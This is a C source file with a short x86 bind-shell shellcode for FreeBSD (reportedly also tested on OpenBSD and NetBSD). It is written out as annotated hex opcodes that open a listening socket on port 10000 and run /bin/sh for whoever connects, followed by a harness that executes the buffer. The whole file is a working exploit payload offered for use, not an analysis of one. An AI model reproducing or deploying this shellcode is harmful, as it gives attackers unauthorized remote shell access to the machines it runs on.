/* 86 bytes portbinding shellcode - FreeBSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * This shellcode binds a shell on port 10000
 * Tested on: FreeBSD-4.3, OpenBSD-2.9, NetBSD-1.5
 *
 */

char code[] =

   "\x31\xc9"			// xor    ecx, ecx
   "\xf7\xe1"           	// mul    ecx
   "\x51"			// push   ecx
   "\x41"			// inc    ecx
   "\x51"			// push   ecx
   "\x41"			// inc    ecx
   "\x51"			// push   ecx
   "\x51"			// push   ecx
   "\xb0\x61"			// mov    al, 97
   "\xcd\x80"			// int	  80h
   "\x89\xc3"			// mov    ebx, eax
   "\x52"			// push   edx
   "\x66\x68\x27\x10"   	// push   word 4135
   "\x66\x51"			// push   cx
   "\x89\xe6"			// mov    esi, esp
   "\xb1\x10"			// mov    cl, 16
   "\x51"			// push   ecx
   "\x56"			// push   esi
   "\x50"			// push   eax
   "\x50"			// push   eax
   "\xb0\x68"			// mov    al, 104
   "\xcd\x80"			// int    80h
   "\x51"			// push   ecx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xb0\x6a"			// mov	  al, 106
   "\xcd\x80"			// int    80h
   "\x52"			// push   edx
   "\x52"			// push   edx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xb0\x1e"			// mov    al, 30
   "\xcd\x80"			// int    80h
   "\xb1\x03"			// mov    cl, 3
   "\x89\xc3"			// mov    ebx, eax
   "\xb0\x5a"			// mov	  al, 90
   "\x49"			// dec    ecx
   "\x51"			// push   ecx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xcd\x80"			// int    80h
   "\x41"			// inc    ecx
   "\xe2\xf5"			// loop   -10
   "\x51"			// push   ecx
   "\x68\x2f\x2f\x73\x68"	// push    dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push	   dword 6e69622fh
   "\x89\xe3"			// mov	   ebx, esp
   "\x51"               	// push   ecx
   "\x54"               	// push   esp
   "\x53"               	// push   ebx
   "\x53"               	// push   ebx
   "\xb0\x3b"           	// mov    al, 59
   "\xcd\x80";			// int	   80h


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}